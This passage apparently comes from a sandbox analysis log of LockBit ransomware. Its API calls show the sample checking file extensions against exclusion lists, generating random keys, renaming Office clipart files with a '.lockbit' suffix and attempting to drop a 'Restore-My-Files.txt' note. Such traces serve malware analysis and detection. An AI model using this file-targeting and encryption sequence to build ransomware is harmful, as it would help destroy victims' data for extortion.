lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.468] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.468] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.469] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.469] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.469] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.469] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.469] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.469] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="STUBBY2.WMF") returned -1 [0177.469] lstrcmpiW (lpString1="ntldr", lpString2="STUBBY2.WMF") returned -1 [0177.469] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="STUBBY2.WMF") returned -1 [0177.469] lstrcmpiW (lpString1="bootsect.bak", lpString2="STUBBY2.WMF") returned -1 [0177.469] lstrcmpiW (lpString1="autorun.inf", lpString2="STUBBY2.WMF") returned -1 [0177.469] lstrcmpiW (lpString1="thumbs.db", lpString2="STUBBY2.WMF") returned 1 [0177.469] lstrcmpiW (lpString1="iconcache.db", lpString2="STUBBY2.WMF") returned -1 [0177.469] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.469] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\STUBBY2.WMF") returned=".WMF" [0177.469] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.469] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.469] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.469] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.469] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.469] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.469] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.469] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.470] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.470] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\STUBBY2.WMF.lockbit") returned 71 [0177.470] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\STUBBY2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\stubby2.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0177.476] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.476] malloc (_Size=0x40068) returned 0x3df0008 [0177.476] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2582) returned 1 [0177.476] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.476] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.476] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.476] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.476] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.478] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\STUBBY2.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\STUBBY2.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.478] malloc (_Size=0xa4) returned 0x1fa2ed8 [0177.478] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0177.479] free (_Block=0x1fa2ed8) [0177.479] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\STUBBY2.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.479] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.479] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.479] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5ac7a110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x36dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="SUMER_01.MID", cAlternateFileName="")) returned 1 [0177.479] lstrcmpiW (lpString1=".", lpString2="SUMER_01.MID") returned -1 [0177.479] lstrcmpiW (lpString1="..", lpString2="SUMER_01.MID") returned -1 [0177.479] PathFindExtensionW (pszPath="SUMER_01.MID") returned=".MID" [0177.479] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0177.479] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0177.479] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0177.479] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0177.479] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0177.479] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0177.479] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0177.480] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0177.480] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0177.480] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0177.480] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0177.480] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0177.480] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0177.480] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0177.480] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0177.480] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0177.480] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0177.480] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0177.480] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0177.480] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0177.480] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0177.480] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0177.481] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0177.481] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0177.481] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SUMER_01.MID") returned -1 [0177.481] lstrcmpiW (lpString1="ntldr", lpString2="SUMER_01.MID") returned -1 [0177.481] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SUMER_01.MID") returned -1 [0177.481] lstrcmpiW (lpString1="bootsect.bak", lpString2="SUMER_01.MID") returned -1 [0177.481] lstrcmpiW (lpString1="autorun.inf", lpString2="SUMER_01.MID") returned -1 [0177.481] lstrcmpiW (lpString1="thumbs.db", lpString2="SUMER_01.MID") returned 1 [0177.481] lstrcmpiW (lpString1="iconcache.db", lpString2="SUMER_01.MID") returned -1 [0177.481] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.481] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned=".MID" [0177.481] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0177.481] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0177.481] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0177.481] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0177.482] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0177.482] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0177.482] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0177.482] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0177.482] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0177.482] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0177.482] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0177.482] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0177.482] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0177.482] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0177.482] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0177.482] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0177.482] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0177.482] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0177.482] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0177.482] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.lockbit") returned 72 [0177.482] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.483] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.483] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.483] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=14044) returned 1 [0177.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.483] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.484] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.488] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.488] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.488] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.488] free (_Block=0x1fa2ed8) [0177.488] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.488] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.488] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.489] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6d43ce90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x2135, dwReserved0=0x0, dwReserved1=0x0, cFileName="SWEST_01.MID", cAlternateFileName="")) returned 1 [0177.489] lstrcmpiW (lpString1=".", lpString2="SWEST_01.MID") returned -1 [0177.489] lstrcmpiW (lpString1="..", lpString2="SWEST_01.MID") returned -1 [0177.489] PathFindExtensionW (pszPath="SWEST_01.MID") returned=".MID" [0177.489] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0177.489] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0177.489] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0177.489] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0177.489] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0177.489] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0177.489] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0177.489] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0177.489] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0177.489] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0177.489] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0177.489] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0177.489] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0177.489] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0177.489] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0177.489] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0177.489] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0177.489] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0177.489] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0177.489] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0177.490] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0177.490] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0177.490] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0177.490] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0177.490] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0177.490] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0177.490] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0177.490] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0177.490] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0177.490] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0177.490] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0177.490] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0177.490] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0177.490] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0177.490] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0177.490] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0177.490] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0177.490] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0177.490] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0177.490] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0177.490] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0177.490] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0177.490] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0177.490] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0177.490] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0177.491] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0177.491] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0177.491] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SWEST_01.MID") returned -1 [0177.491] lstrcmpiW (lpString1="ntldr", lpString2="SWEST_01.MID") returned -1 [0177.491] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SWEST_01.MID") returned -1 [0177.491] lstrcmpiW (lpString1="bootsect.bak", lpString2="SWEST_01.MID") returned -1 [0177.491] lstrcmpiW (lpString1="autorun.inf", lpString2="SWEST_01.MID") returned -1 [0177.491] lstrcmpiW (lpString1="thumbs.db", lpString2="SWEST_01.MID") returned 1 [0177.491] lstrcmpiW (lpString1="iconcache.db", lpString2="SWEST_01.MID") returned -1 [0177.491] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.491] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned=".MID" [0177.491] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0177.491] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0177.491] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0177.491] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0177.491] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0177.491] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0177.491] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0177.491] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0177.491] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0177.491] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0177.491] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0177.492] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0177.492] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0177.492] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0177.492] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0177.492] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0177.492] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0177.492] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0177.492] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0177.492] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0177.492] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0177.492] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0177.492] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0177.492] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0177.492] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0177.492] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0177.492] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0177.492] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0177.492] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.lockbit") returned 72 [0177.492] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0177.496] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.496] malloc (_Size=0x40068) returned 0x3d70450 [0177.496] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=8501) returned 1 [0177.497] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.497] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0177.497] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.497] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0177.497] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0177.499] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.lockbit", 